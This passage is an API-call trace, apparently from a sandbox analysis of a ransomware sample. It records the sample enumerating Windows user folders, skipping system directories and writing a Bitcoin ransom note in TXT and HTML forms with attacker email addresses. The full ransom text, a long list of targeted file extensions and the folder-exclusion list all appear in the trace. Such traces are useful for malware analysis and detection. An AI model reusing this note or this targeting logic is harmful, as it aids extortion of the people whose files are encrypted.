spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0180.424] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1
	[0180.424] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1
	[0180.424] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1
	[0180.424] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1
	[0180.424] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1
	[0180.424] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1
	[0180.424] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0
	[0180.425] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0180.425] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0180.425] lstrcpyW (in: lpString1=0x18d1b4, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public"
	[0180.425] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\*.*") returned="C:\\Users\\Public\\*.*"
	[0180.425] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.426] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.426] wsprintfW (in: param_1=0x18caa0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Public\\HELP_DECRYPT_YOUR_FILES.TXT") returned 43
	[0180.426] CreateFileW (lpFileName="C:\\Users\\Public\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0180.426] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.426] WriteFile (in: hFile=0x37c, lpBuffer=0x18be58*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18cd7c, lpOverlapped=0x0 | out: lpBuffer=0x18be58*, lpNumberOfBytesWritten=0x18cd7c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.429] CloseHandle (hObject=0x37c) returned 1
	[0180.429] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18be28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18be28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.430] GetUserNameA (in: lpBuffer=0x18bd0c, pcbBuffer=0x18be24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18be24) returned 1
	[0180.431] wsprintfW (in: param_1=0x18cca8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.431] CreateFileW (lpFileName="C:\\Users\\Public\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0180.431] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.431] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.431] WriteFile (in: hFile=0x37c, lpBuffer=0x18cca8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18cd84, lpOverlapped=0x0 | out: lpBuffer=0x18cca8*, lpNumberOfBytesWritten=0x18cd84*=0x30, lpOverlapped=0x0) returned 1
	[0180.432] CloseHandle (hObject=0x37c) returned 1
	[0180.432] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.432] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.432] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.432] wsprintfW (in: param_1=0x18ca60, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Public\\HELP_DECRYPT_YOUR_FILES.HTML") returned 44
	[0180.432] CreateFileW (lpFileName="C:\\Users\\Public\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0180.433] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.433] WriteFile (in: hFile=0x37c, lpBuffer=0x18c254*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18cd78, lpOverlapped=0x0 | out: lpBuffer=0x18c254*, lpNumberOfBytesWritten=0x18cd78*=0x808, lpOverlapped=0x0) returned 1
	[0180.435] CloseHandle (hObject=0x37c) returned 1
	[0180.436] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.436] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18c23c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18c23c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.436] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.436] GetUserNameA (in: lpBuffer=0x18c120, pcbBuffer=0x18c238 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18c238) returned 1
	[0180.437] wsprintfA (in: param_1=0x18cc68, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.438] CreateFileW (lpFileName="C:\\Users\\Public\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0180.438] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.439] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.439] WriteFile (in: hFile=0x37c, lpBuffer=0x18cc68*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18cd80, lpOverlapped=0x0 | out: lpBuffer=0x18cc68*, lpNumberOfBytesWritten=0x18cd80*=0x43, lpOverlapped=0x0) returned 1
	[0180.439] CloseHandle (hObject=0x37c) returned 1
	[0180.439] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*.*" (normalized: "c:\\users\\public\\*.*"), lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x85132167, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0180.440] lstrlenW (lpString="C:\\Users\\Public\\*.*") returned 19
	[0180.440] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.440] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\*.*", cchLength=0x13 | out: lpsz="c:\\users\\public\\*.*") returned 0x13
	[0180.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.440] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="windows") returned 0x0
	[0180.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.440] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="boot") returned 0x0
	[0180.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.441] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="system volume information") returned 0x0
	[0180.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.441] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.441] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="temp") returned 0x0
	[0180.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.441] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="program files") returned 0x0
	[0180.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.442] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.442] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="appdata") returned 0x0
	[0180.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.442] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="application data") returned 0x0
	[0180.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.442] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="winnt") returned 0x0
	[0180.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.443] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="tmp") returned 0x0
	[0180.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.443] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="cache") returned 0x0
	[0180.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.443] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.443] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="webcache") returned 0x0
	[0180.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.444] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="inetcache") returned 0x0
	[0180.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.444] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="nvidia") returned 0x0
	[0180.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.444] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="packages") returned 0x0
	[0180.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.445] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="cookies") returned 0x0
	[0180.445] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.445] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="programdata") returned 0x0
	[0180.445] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0180.445] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0180.445] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x85132167, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.445] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0180.445] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccountPictures", cAlternateFileName="ACCOUN~1")) returned 1
	[0180.445] lstrcmpW (lpString1="AccountPictures", lpString2="..") returned 1
	[0180.446] lstrcmpW (lpString1="AccountPictures", lpString2=".") returned 1
	[0180.446] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public"
	[0180.446] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\"
	[0180.446] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="AccountPictures" | out: lpString1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures"
	[0180.446] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\AccountPictures" | out: lpString1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures"
	[0180.446] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\AccountPictures\\") returned="C:\\Users\\Public\\AccountPictures\\"
	[0180.446] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Public\\AccountPictures\\" | out: lpString1="C:\\Users\\Public\\AccountPictures\\") returned="C:\\Users\\Public\\AccountPictures\\"
	[0180.446] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\AccountPictures\\*.*") returned="C:\\Users\\Public\\AccountPictures\\*.*"
	[0180.446] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\AccountPictures\\*.*" (normalized: "c:\\users\\public\\accountpictures\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0180.447] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\*.*") returned 35
	[0180.447] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.447] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\AccountPictures\\*.*", cchLength=0x23 | out: lpsz="c:\\users\\public\\accountpictures\\*.*") returned 0x23
	[0180.447] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.448] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="windows") returned 0x0
	[0180.448] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.448] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="boot") returned 0x0
	[0180.448] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.448] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="system volume information") returned 0x0
	[0180.448] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.448] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.448] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.449] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="temp") returned 0x0
	[0180.449] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.449] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="program files") returned 0x0
	[0180.449] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.449] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.449] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.449] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="appdata") returned 0x0
	[0180.449] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.450] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="application data") returned 0x0
	[0180.450] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.450] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="winnt") returned 0x0
	[0180.450] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.450] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="tmp") returned 0x0
	[0180.450] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.451] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="cache") returned 0x0
	[0180.451] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.451] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.451] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.451] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="webcache") returned 0x0
	[0180.451] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.451] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="inetcache") returned 0x0
	[0180.452] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.452] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="nvidia") returned 0x0
	[0180.452] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.452] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="packages") returned 0x0
	[0180.452] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.452] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="cookies") returned 0x0
	[0180.452] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.453] StrStrW (lpFirst="c:\\users\\public\\accountpictures\\*.*", lpSrch="programdata") returned 0x0
